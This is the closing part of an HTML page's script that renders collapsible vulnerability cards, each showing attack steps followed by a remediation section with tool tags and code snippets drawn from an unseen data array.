          ${step.tools ? `<div style="margin-top:6px">${step.tools.map(t => `<span class="tool-tag">${t}</span>`).join('')}</div>` : ''}
          ${step.code ? `<div style="margin-top:6px"><code>${step.code.replace(/\n/g, '<br>')}</code></div>` : ''}
        </div>
      </div>`;
  });

  // Remediation section
  flowHTML += `<div class="divider divider-fix"><div class="divider-line"></div><div class="divider-label">🛡 REMEDIATION</div><div class="divider-line"></div></div>`;

  fixSteps.forEach((step, i) => {
    const isLast = i === fixSteps.length - 1;
    flowHTML += `
      <div class="flow-step step-${step.type}">
        <div class="flow-line">
          <div class="flow-node">${stepIcons[step.type]}</div>
          ${!isLast ? '<div class="flow-connector"></div>' : ''}
        </div>
        <div class="flow-content">
          <h4>${stepLabels[step.type]}: ${step.title}</h4>
          <p>${step.desc}</p>
          ${step.tools ? `<div style="margin-top:6px">${step.tools.map(t => `<span class="tool-tag">${t}</span>`).join('')}</div>` : ''}
          ${step.code ? `<div style="margin-top:6px"><code>${step.code.replace(/\n/g, '<br>')}</code></div>` : ''}
        </div>
      </div>`;
  });

  flowHTML += '</div>';
  body.innerHTML = flowHTML;

  header.addEventListener('click', () => {
    const isOpen = body.classList.contains('open');
    body.classList.toggle('open', !isOpen);
    header.querySelector('.toggle-icon').classList.toggle('open', !isOpen);
  });

  card.appendChild(header);
  card.appendChild(body);
  return card;
}

const grid = document.getElementById('vulnGrid');
vulns.forEach(v => grid.appendChild(buildCard(v)));
</script>
</body>
</html>